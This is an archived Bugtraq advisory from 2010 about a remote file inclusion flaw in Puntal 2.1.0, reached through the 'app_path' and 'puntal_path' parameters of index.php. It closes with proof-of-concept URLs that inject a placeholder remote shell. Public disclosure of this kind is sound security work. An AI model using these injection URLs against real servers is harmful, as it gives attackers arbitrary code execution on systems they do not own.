lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 3 May 2010 12:10:25 -0600 From: eidelweiss@...erservices.com To: bugtraq@...urityfocus.com Subject: Puntal (index.php) Remote File Inclusion Vulnerabilities Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system. Puntal 2.1.0 is vulnerable; other versions may also be affected. An attacker can exploit these issues via a browser. -=[P0C]=- http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll] or http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll
Powered by blists - more mailing lists